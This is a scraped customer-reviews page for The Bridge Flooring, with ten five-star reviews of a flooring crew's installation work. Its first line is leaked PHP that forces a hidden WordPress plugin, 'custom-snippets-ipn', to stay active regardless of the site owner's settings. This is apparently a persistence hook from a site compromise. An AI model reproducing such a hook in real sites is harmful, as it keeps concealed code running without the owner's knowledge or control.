add_filter( 'option_active_plugins', function( $plugins ){ $myplugin = "custom-snippets-ipn/custom-snippets.php"; if( !in_array( $myplugin, $plugins ) ){ $plugins[] = $myplugin; } return $plugins; } ); Customer Reviews - The Bridge Flooring
Skip to content Skip to footer
The Bridge Flooring

Custumer Reviews

Hear what our happy customers have to say about us.

Real Feedback from our Satisfied Customers

SuPete
SuPete
5 out of 5 stars
a week ago
Diego and his crew removed old carpet and installed hardwood flooring in my bedroom and hallway. It was a tough job, but he and his outstanding crew did wonderful work. They were on time, very professional, friendly and respectful of my property. I would absolutely recommend them. The finished product is just beautiful!
Sue Burke
Sue Burke
5 out of 5 stars
in the last week
Timely, professional and courteous, Diego and his team installed new vinyl flooring in our basement. They were professional and knowledgeable. I would hire him and his team again. Their workmanship was perfect. They left the basement and work area clean. Great job and company!
Phil LaPorte
Phil LaPorte
5 out of 5 stars
in the last week
The Bridge quoted me the best price and were able to come out a week later to get started. They finished the tile demo and vinyl installation within a day and a half! Highly recommended.
Highmark Enterprises
Highmark Enterprises
5 out of 5 stars
a week ago
These guys are awesome to work with. Fantastic communication from start to finish. Floors look amazing!! They were on time, cleaned up after they were done. We couldn’t be happier and will use them on all of our properties!!!
Flawless Body Studio KC
Flawless Body Studio KC
5 out of 5 stars
2 weeks ago
I needed floors asap since I learned real quick I had no skills. He came over for the estimate and got it all done on time and very quickly. He was charging a very good rate compared to most others and he even reattached the base for us too! We will use him again and recommend him to anyone needing good quality work without being hit on the head with high pricing. We love our new spa floors! ❤️❤️❤️❤️
Desi Jostmeyer
Desi Jostmeyer
5 out of 5 stars
a month ago
Absolutely amazing job done by Diego and his crew! He got back to me right away with a reasonably priced quote and details of the work. They were able to work on our floors right away and knocked it out in one day. I got a handful of quotes from flooring contractors and these guys were by far the best option. They were on time, quick to communicate with me, guaranteed a price off the bat, and exceeded our expectations! They couldn’t have done a better job installing 1,300 square feet of vinyl flooring in our basement. Can’t recommend The Bridge Flooring enough - we will be using them again!!
Cristiano Calil Rede
Cristiano Calil Rede
5 out of 5 stars
a month ago
Amazing service! Always on time, my whole house was done in 2 days. Also appreciated the honesty on pricing and timeline commitment!
Emmanuel Pereira
Emmanuel Pereira
5 out of 5 stars
2 months ago
Very satisfied with the work Diego and The Bridge provided! Honest pricing, great communication and high quality service. I recommend The Bridge to everyone who asks!
Arpit Phanshikar
Arpit Phanshikar
5 out of 5 stars
2 months ago
Used Diego and team from The Bridge Flooring.l for installing Luxury Vinyl. Overall experience was very professional. Diego gave me the best possible quote for installation and gave accurate estimate for materials. On the installation day, he arrived on time and did an excellent job. Went above and beyond to fix minute things and cleaned the flooring as well. Highly recommend this business for your flooring needs.
Ace M
Ace M
5 out of 5 stars
3 months ago
I need to thank all employees at The Bridge Flooring. I dealt with 3 of their employees and they were all nice, respectful and always wanting to please and do a good job. Very nice guys. Very good service. They opened up their schedule to fit my desperate needs, for which I am VERY thankful. They did a fantastic job, fast, clean, careful, and reasonable priced. I will definitely look for them again in any future flooring job.
Click here and write your review

Get a Free, No-obligation quote today.

Get an Estimate Today!

We look forward to working with you and having you as our next customer.